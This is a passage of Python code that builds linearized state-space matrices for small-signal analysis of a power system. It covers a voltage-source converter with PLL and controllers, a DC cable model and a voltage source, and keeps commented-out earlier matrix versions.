Madq = xo[cpr.x_idx['Madq']]
Md = xo[cpr.x_idx['Md']]
Mq = xo[cpr.x_idx['Mq']]
Xp = xo[cpr.x_idx['Xp']]
Xq = xo[cpr.x_idx['Xq']]
Xf = xo[cpr.x_idx['Xf']]
Pm = xo[cpr.x_idx['Pm']]
Qm = xo[cpr.x_idx['Qm']]
Vm = xo[cpr.x_idx['Vm']]
vd = uo[0]
vq = uo[1]
vdc = uo[2]
# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt + (-Iq*cpr.Ki_pll*cpr.Lt - cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, -cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), 0, 0],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/(cpr.Lt*vdc), cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/(cpr.Lt*vdc)],
# [-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0, cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt + (
-Iq * cpr.Ki_pll * cpr.Lt - cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc),
0, -cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), 0, 0],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0,
cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / (cpr.Lt * vdc),
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / (cpr.Lt * vdc)],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp,
0, 0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt + (-Iq*cpr.Kp_pll*cpr.Lt - cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, -cpr.wn*(-Iq*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madd + Md*cpr.Kic + cpr.Kpc*(-Id + Xp*cpr.Kip + cpr.Kpp*(-Pm + Xf*cpr.Kif + cpr.Kpf*(-Xpll*cpr.Ki_pll - cpr.Kp_pll*vq + 1) + cpr.Pref)))/(cpr.Lt*vdc**2)],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt, -cpr.wn*(Id*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madq + Mq*cpr.Kic + cpr.Kpc*(-Iq + Xq*cpr.Kiq + cpr.Kpq*(cpr.Kq*(Qm - cpr.Qref) + cpr.Kv*(Vm - cpr.Vref))))/(cpr.Lt*vdc**2)],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp, 0],
# [0, 0, 0],
# [1/cpr.Tad, 0, 0],
# [0, 1/cpr.Tad, 0],
# [0, cpr.Kp_pll*cpr.wn, 0],
# [0, 1, 0],
# [0, -cpr.Kp_pll, 0],
# [0, -cpr.Kp_pll*cpr.Kpf, 0],
# [0, 0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm, 0],
# [-Iq/cpr.Tpm, Id/cpr.Tpm, 0],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), 0],
# ])
Bvac = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt + (
-Iq * cpr.Kp_pll * cpr.Lt - cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Bvdc = np.array([[-cpr.wn * (
-Iq * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madd + Md * cpr.Kic + cpr.Kpc * (
-Id + Xp * cpr.Kip + cpr.Kpp * (
-Pm + Xf * cpr.Kif + cpr.Kpf * (-Xpll * cpr.Ki_pll - cpr.Kp_pll * vq + 1) + cpr.Pref))) / (
cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madq + Mq * cpr.Kic + cpr.Kpc * (
-Iq + Xq * cpr.Kiq + cpr.Kpq * (
cpr.Kq * (Qm - cpr.Qref) + cpr.Kv * (Vm - cpr.Vref)))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * vd + Iq * vq) / (cpr.Ldc * vdc ** 2)],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Cdc = np.zeros((1, cpr.nx))
Cdc[0, cpr.x_idx['Idc']] = 1
Dc = np.zeros((2, 2))
A = Ac + Bvac @ Rvc
B = Bvac @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, Bvdc, C, Cdc, D
def vsc_linear_2(x0, u0, cpr):
Id = x0[cpr.x_idx['Id']]
Iq = x0[cpr.x_idx['Iq']]
theta = x0[cpr.x_idx['Theta']]
Xpll = x0[cpr.x_idx['Xpll']]
Madd = x0[cpr.x_idx['Madd']]
Madq = x0[cpr.x_idx['Madq']]
Md = x0[cpr.x_idx['Md']]
Mq = x0[cpr.x_idx['Mq']]
Xp = x0[cpr.x_idx['Xp']]
Xq = x0[cpr.x_idx['Xq']]
Qm = x0[cpr.x_idx['Qm']]
Vm = x0[cpr.x_idx['Vm']]
vd = u0[0]
vq = u0[1]
vdc = u0[2]
# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt - Iq*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, 0, 0, cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*cpr.Vref*vdc)],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.wn/(cpr.Lt*vdc), 0],
# [-1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kip, 0, 0, 0, cpr.Kpp/cpr.Vref],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq, 0],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1/cpr.Vref],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0,
cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt - Iq * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0,
cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0, 0, 0,
cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * cpr.Vref * vdc)],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0, cpr.Kpc * cpr.Kpq * cpr.wn / (cpr.Lt * vdc), 0],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kip, 0, 0, 0, cpr.Kpp / cpr.Vref],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq, 0],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 / cpr.Vref],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt - Iq*cpr.Kp_pll*cpr.Lt/vdc)/cpr.Lt, -cpr.wn*(-Iq*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madd + Md*cpr.Kic + cpr.Kpc*(-Id + Xp*cpr.Kip + cpr.Kpp*(Vm/cpr.Vref - 1)))/(cpr.Lt*vdc**2)],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt, -cpr.wn*(Id*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madq + Mq*cpr.Kic + cpr.Kpc*(-Iq + Xq*cpr.Kiq + cpr.Kpq*(Qm - cpr.Qref)))/(cpr.Lt*vdc**2)],
# [0, 0, 0],
# [0, 0, 0],
# [1/cpr.Tad, 0, 0],
# [0, 1/cpr.Tad, 0],
# [0, cpr.Kp_pll*cpr.wn, 0],
# [0, 1, 0],
# [0, -cpr.Kp_pll, 0],
# [0, 0, 0],
# [0, 0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm, 0],
# [-Iq/cpr.Tpm, Id/cpr.Tpm, 0],
# [0, 0, 1/cpr.Tvm],
# ])
Bvac = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt - Iq * cpr.Kp_pll * cpr.Lt / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, 0],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, 0],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[0, 0],
])
Bvdc = np.array([[-cpr.wn * (
-Iq * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madd + Md * cpr.Kic + cpr.Kpc * (
-Id + Xp * cpr.Kip + cpr.Kpp * (Vm / cpr.Vref - 1))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madq + Mq * cpr.Kic + cpr.Kpc * (
-Iq + Xq * cpr.Kiq + cpr.Kpq * (Qm - cpr.Qref))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * vd + Iq * vq) / (cpr.Ldc * vdc ** 2)],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[1 / cpr.Tvm],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Cdc = np.zeros((1, cpr.nx))
Cdc[0, cpr.x_idx['Idc']] = 1
Dc = np.zeros((2, 2))
A = Ac + Bvac @ Rvc
B = Bvac @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, Bvdc, C, Cdc, D
def dc_cable_linear(x0, u0, lpr):
A = np.array([[-lpr.R * lpr.wn / lpr.L, lpr.wn / lpr.L, -lpr.wn / lpr.L],
[-2 * lpr.wn / lpr.C, -lpr.G * lpr.wn / lpr.C, 0],
[2 * lpr.wn / lpr.C, 0, -lpr.G * lpr.wn / lpr.C],
])
B = np.array([[0, 0],
[2 * lpr.wn / lpr.C, 0],
[0, -2 * lpr.wn / lpr.C],
])
C = np.zeros((1, lpr.nx))
D = np.zeros((1, 2))
return A, B, C, D
def vs_linear(x0, u0, vspr):
phi = x0[vspr.x_idx['phi']]
Ix = x0[vspr.x_idx['Ix']]
Iy = x0[vspr.x_idx['Iy']]
Vx = u0[0]
Vy = u0[1]
Ex = vspr.V0 * np.cos(phi)
Ey = vspr.V0 * np.sin(phi)
# A = np.array([[-1 + (Ex/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy) + vspr.V0*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)*np.sin(phi)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2), (vspr.R/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy) + (vspr.L + vspr.R)*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2), (vspr.R*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2 + (-vspr.L - vspr.R)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy))/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)],
# [0, -vspr.R*vspr.wn/vspr.L, vspr.wn],
# [0, -vspr.wn, -vspr.R*vspr.wn/vspr.L],
# ])
A = np.array([[-1 + ((Ey - Ex) * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2 + (Ey + Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2), (
vspr.R / (-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) + (
vspr.R + vspr.X) * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2), (
vspr.R * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2 + (
-vspr.R - vspr.X) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2)],
[-Ey * vspr.wn / vspr.X, -vspr.R * vspr.wn / vspr.X, vspr.wn],
[Ex * vspr.wn / vspr.X, -vspr.wn, -vspr.R * vspr.wn / vspr.X],
])
# B = np.array([[1/((1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)*(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)), (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/((1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)*(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)],
# [-vspr.wn/vspr.L, 0],
# [0, -vspr.wn/vspr.L],
# ])
B = np.array([[1 / ((1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)),
(Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / ((1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2)],
[-vspr.wn / vspr.X, 0],
[0, -vspr.wn / vspr.X],
])
C = np.zeros((2, vspr.nx))
C[0, vspr.x_idx['Ix']] = 1
C[1, vspr.x_idx['Iy']] = 1
D = np.zeros((2, 2))
return A, B, C, D
def vs_linear2(x0, u0, vspr):
phi = x0[vspr.x_idx['phi']]
# Ix = x0[vspr.x_idx['Ix']]
# Iy = x0[vspr.x_idx['Iy']]
Vx = u0[0]
Vy = u0[1]
Ex = vspr.V0 * np.cos(phi)
Ey = vspr.V0 * np.sin(phi)
Ix = (-vspr.R * (Vx - Ex) - vspr.X * (Vy - Ey)) / (vspr.R ** 2 + vspr.X ** 2)
Iy = (vspr.X * (Vx - Ex) - vspr.R * (Vy - Ey)) / (vspr.R ** 2 + vspr.X ** 2)
# ####
# phi = np.deg2rad(10)
# d = np.deg2rad(3)
# theta = np.deg2rad(85)
# E = 1.1*np.exp(1j*phi)
# V = 1.05*np.exp(1j*d)
# Z = 0.15*np.exp(1j*theta)
# I = (E-V)/Z
# (abs(E)*np.cos(phi-theta)-abs(V)*np.cos(d-theta))/abs(Z)
# (abs(E)*np.sin(phi-theta)-abs(V)*np.sin(d-theta))/abs(Z)
# (E.real*(1/Z).real-E.imag*(1/Z).imag
# -V.real*(1/Z).real+V.imag*(1/Z).imag)
# np.cos(-theta)/abs(Z)
# (1/Z).real
# r=Z.real
# x = Z.imag
# Ix = I.real
# Iy = I.imag
# Ex = E.real
# Ey = E.imag
# Ex-r*Ix+x*Iy
# Ey-r*Iy-x*Ix
# Zmat = np.array([[-Z.real,Z.imag],
# [-Z.imag,-Z.real]])
# Zmat_inv = np.linalg.inv(Zmat)
